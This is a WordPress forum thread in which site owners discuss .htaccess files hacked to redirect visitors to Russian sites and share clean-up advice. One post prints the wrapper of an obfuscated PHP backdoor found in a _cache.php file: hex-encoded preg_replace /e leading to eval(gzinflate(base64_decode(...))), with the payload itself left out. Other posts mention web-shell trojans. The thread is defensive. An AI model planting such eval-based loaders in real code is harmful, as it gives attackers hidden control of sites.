.htaccess Hacked, Redirects to Russion Site

Did anyone find a solution?
Thanks

I was also told that putting the following line into htaccess would help
RewriteRule \.ht[ap] – [NC,F]
Thanks

Did anyone find a solution?

Scroll up and read Jan Dembowski’s post.

@kmessinger I did, but as this is not a WordPress specific issue, and I was looking for the cause rather just recovering after the problem.

It seems everyone is at a loss right now as to how to stop it happening again.
https://forum.joomla.org/viewtopic.php?f=432&t=705216&start=60#p2778501

I was looking for the cause

There is always a way to get in if someone wants to badly enough. Right now the shared servers most of us use makes it a lot easier.

The war against hackers won’t be won unless companies change the way they use computer networks. UPDATED with a comment provided by the FBI. https://www.tomsguide.com/us/Hackers-FBI-Shawn-Henry-Anonymous-LulzSec,news-14627.html

https://codex.wordpress .org/Hardening_WordPress will help. Good karma will help.

Be sure to look up and down ALL the directories in your hosting. I found random .php files in several places in my directory tree, far away from where my WordPress installation was.

Look for PHP files with strange names. Look for PHP files where they don’t belong — in directories by themselves, in image directories, in directories full of HTML files, with your error pages.

Look at the modification dates especially. Sort the files in each directory by modification date. Chances are you’ll see suspicious files modified in the last week or two in places where you know you weren’t working.

Wherever they are, they can go off and rewrite your .htaccess files.

Both /mylogin/.htaccess and /mylogin/public_html/.htaccess gets modified. Redirecting to random .ru websites.

How did i miss this post. I was searching all around for the solution.
Now, I found the wp-content\upload\_cache.php file with encrypted code and did some research.

<?php
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'
.......
'\x29\x29\x20\x29\x20\x3b",".");?>

It decodes to

<?php
preg_replace("/.*/e","eval ( gzinflate ( base64_decode ('
........
')) ) ;",".");?>

Running it on server, you can see it in action : a real Backdoor.
This is just “one” example, there are many out there, with name other than “_cache.php” all due to this thumb.php lying there in some of my old inactive theme.

Tired of this hack, facing since last 3 months, but there was no problem in viewing the site. I finally erased everything last night, and now rebuilding it again, after my site got black-listed in Google search. ??

I encountered a very similar problem today. My htaccess file looks the very similar to the OPs.

In my case there were no _cache.php files, but there was a mystery folder (named ‘zreqgigkqvt’) in the wp-content/plugins folder. This folder does not show up in the WordPress plugin list. Contents include edw.php and gsm.php, which contain PhpShel-G and PHPShell-A trojans respectively. It also contains several other random-character-name folders, all of which contain edw.php and lists of words to target (viagra, cialis, etc).

edw.php also contains references to mx.hotmail.com and port 25.

I found the same problem today, 1.: the htaccess looked nearly like this from ramirez_fabian above, 2.: there was a second index.php: called Index.php.
3: I deleted all,but one hour later the htacces was once more corrupted, then i found a file “.000_cache.php” in the upload-folder, since i deleted this it works, but some security software still let the people not on my site.

Excuse my bad english.

I had the same problem with the .httaccess files.

I found the file _cache.php and I erased it. Also, I erased all the .htaccess files and replaced them with new empty ones.

the problem was solved.

It’s better to erase all the data and install a fresh wordpress copy.

I recently started a WordPress site and now I find I’m getting emails warning me my site now has a ‘registered new user’. In fact, I’m getting dozens of these advisory emails and when I log-on to my site I find I’ve got hundreds of posts for other sites/products.
1- How can I block these people access to my site
2 – I have found several Usernames listed on the log-in menu but only my password
3 – How can I block my password from automatically coming up as soon as I hit my listed Username?

Help! Please as I fear losing my site completely to all this SPAM stuff or someone smarter than me taking control of my domain and locking me out or doing something illegal.
Eddieman.

I’ve been having the same issue as this for the last while as well. However in my case I wasn’t able to locate a file any problematic files in the uploads. In the situation of my client I found code in the cgi folder off root and was named ‘wp-xgqdi.php’.

I’ve deleted the file, cleaned up the .htaccess files and notified Google of the resolution. I’ll post in here if my issue is resolved.

I found a _cache.php file hidden on my hosting account (Bluehost) on a site I haven’t touched in over a year. Deleted the file and everything seems to be okay so far. (It’s been 2 hours).

Just following up. Been a week since I removed the file and it is still clean.